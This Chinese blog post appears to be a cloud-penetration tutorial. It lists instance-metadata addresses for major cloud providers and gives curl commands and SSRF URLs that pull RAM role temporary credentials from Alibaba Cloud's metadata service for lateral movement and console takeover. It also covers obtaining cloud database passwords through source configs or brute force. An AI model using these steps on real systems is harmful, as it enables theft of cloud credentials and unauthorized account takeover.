云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

Ethan医生9个月前服务安全237

元数据解释:

实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。)

 

各大云元数据地址:

阿里云元数据地址:http://100.100.100.200/

腾讯云元数据地址:http://metadata.tencentyun.com/

华为云元数据地址:http://169.254.169.254/

亚马云元数据地址:http://169.254.169.254/

微软云元数据地址:http://169.254.169.254/

谷歌云元数据地址:http://metadata.google.internal/

 

细节方面可通过访问官网找元数据访问触发说明,阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata

 

 

#云服务-弹性计算-元数据&SSRF&AK

1、前提条件:

-弹性计算配置访问控制角色

-SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)

 

2、利用环境1:获取某服务器权限后横向移动

-获取关键信息

curl http://100.100.100.200/latest/meta-data/

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

-获取临时凭证

http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

-利用AK横向移动

CF 云渗透框架项目:https://wiki.teamssix.com/CF/

 

3、利用环境2:某服务器上Web资产存在SSRF漏洞

-获取关键信息

http://100.100.100.200/latest/meta-data/

http://100.100.100.200/latest/meta-data/ram/security-credentials/

-获取临时凭证

http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

-利用AK横向移动

CF 云渗透框架项目:https://wiki.teamssix.com/CF/

 

#云服务-云数据库-外部连接&权限提升

1、帐号密码:

源码配置中找到(几率高)或爆破手段(几率低)

2、连接获取:

-白名单&外网 直接Navicat支持连接

-内网需要其中内网某一个服务器做转发

3、AK利用(权限提升)

CF 云渗透框架项目:https://wiki.teamssix.com/CF/


相关文章

开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE复现

#PHP-框架安全-Thinkphp&Laravel#Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。1、CVE-2021-3129 RCELar...

云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

#K8S集群架构解释(见上图参考)Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制...

云原生篇&K8s安全&实战场景&攻击Pod&污点Taint&横向移动&容器逃逸

场景实战:1、攻击Pod部署Web应用2、利用ApiServer未授权3、实现挂载目录宿主机逃逸4、利用污点Taint横向移动5、利用Config泄漏横向移动 Web应用部署:(struts...

云上攻防-云原生篇&Kubernetes集群&Etcd存储&Dashboard面板&Porxy暴漏&Config泄露

#Dashboard未授权访问默认端口:8001配置不当导致dashboard未授权访问,通过dashboard可以控制整个集群。kubernetes dashboard的未授权其实分两种情况:一种是...

Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现

-Solr:主要基于HTTP和Apache Lucene实现的全文搜索服务器。历史漏洞:https://avd.aliyun.com/search?q=Solr黑盒特征:图标及端口83931、命令执行...

云上攻防-云原生篇&Kubernetes集群&Etcd存储&Dashboard面板&Porxy暴漏&Config泄露

云上攻防-云原生篇&Kubernetes集群&Etcd存储&Dashboard面板&Porxy暴漏&Config泄露

➢ 云上攻防-Docker容器-特权模式&危险挂载&逃逸➢ 云上攻防-Docker容器-系统内核&版本漏洞&CDK➢ 云上攻防-Docke...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。